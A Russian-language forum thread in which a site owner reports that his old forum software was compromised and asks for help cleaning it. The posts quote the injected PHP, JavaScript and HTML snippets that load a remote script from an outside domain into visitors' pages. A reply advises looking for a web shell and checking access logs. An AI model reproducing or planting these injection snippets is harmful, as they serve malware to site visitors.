Перейти к контенту
  • 0

Проблема безопасности

Kowex

Спросил Kowex,

 Поделиться

Вопрос

Kowex

Kowex

Опубликовано
Опубликовано

Собственно в чем проблема.

Форум 2.3.6

Работал форум долго без проблем, никаких изменений на нем небыло уже больше 2х лет (установка модов или подобных изменений)

И тут система выдала ошибку мода wr_domain (мульти домен) который ставил WildRAID 

syntax error, unexpected T_VARIABLE in C:\\wwwroot\xxxxxxxx.ru\wr_domain\class_wr_domain.php on line 257

отключил этот мод в файле index.php, форум поднялся, но рухнула почти вся джава, не открывается быстрый ответ, не вставляются ники в быстрый ответ, в админке не работают кнопки у стилей и т.д. и пользователи стали жаловаться на вирусы, стал искать.

Нашел что в почти всех файлах php и файлах js присутствует сторонний код

в файлах php

<?php
#39057f#
if(empty($aaiv)) {

$aaiv = "<script src=\"http://welovemelon.com/mongasweet/srAW8j9t.php?id=4554795\" type=\"text/javascript\"></script>";

echo $aaiv;

}


#/39057f#
?>

В файлах js

/*187cc4*/
document.write('<script src="http://welovemelon.com/mongasweet/srAW8j9t.php?id=4554786" type="text/javascript"></script>');
/*/187cc4*/

в файлах html

<!--f3f11d--><script src="http://welovemelon.com/mongasweet/srAW8j9t.php?id=4554582" type="text/javascript"></script><!--/f3f11d-->

Всё что нашел удалил, но ситуация не изменилась.

Писал WildRAID но он не отвечает :(

 

В чем может быть дело? И как это можно решить?

 

Ещё лучше если кто то поможет решить данную проблему.

Нужно:

1. Восстановить полностью работу форума

2. Закрыть дырки через которые это залезло.

Естественно не бесплатно.

Ссылка на комментарий
Поделиться на других сайтах

2 ответа на этот вопрос

Рекомендуемые сообщения

  • 0
Arhar

Arhar

Опубликовано
Опубликовано

Дырки на сервере скорее всего, чаще всего шелл, уязвимость залития также возможно связана с ПО сервера.

Необходимо сделать ацесс логи к абсолютно ко всему, после чего удалить коды, потом в них можно увидеть к какому файлу обращаются, чтобы эти коды выставить.

Потом удалить этот файл и следить, через какой запрос он появится снова. Так можно уточнить уязвимость.

Ну естественно это если машина полностью принадлежит, а не несколько сайтов на одной машине. В таком случае менять хостера, у него вирус.

Ссылка на комментарий
Поделиться на других сайтах
  • 0
Kowex

Kowex

Опубликовано
  • Автор
Опубликовано

Сервер свой собственный, да, на нем несколько сайтов.


 

 

Необходимо сделать ацесс логи к абсолютно ко всему, после чего удалить коды, потом в них можно увидеть к какому файлу обращаются, чтобы эти коды выставить.

А вот кто это может сделать? 

Ссылка на комментарий
Поделиться на других сайтах

Присоединиться к обсуждению

Вы можете ответить сейчас, а зарегистрироваться позже. Если у вас уже есть аккаунт, войдите, чтобы ответить от своего имени.

Гость
Unfortunately, your content contains terms that we do not allow. Please edit your content to remove the highlighted words below.
Ответить на вопрос...

×   Вы вставили отформатированный текст.   Удалить форматирование

  Допустимо не более 75 смайлов.

×   Ваша ссылка была автоматически заменена на медиа-контент.   Отображать как ссылку

×   Ваши публикации восстановлены.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

Зарузка...
×
 Поделиться
Перейти к списку вопросов
×
×
  • Создать...

Важная информация

Находясь на нашем сайте, вы соглашаетесь на использование файлов cookie, а также с нашим положением о конфиденциальности Политика конфиденциальности и пользовательским соглашением Условия использования.

  Согласен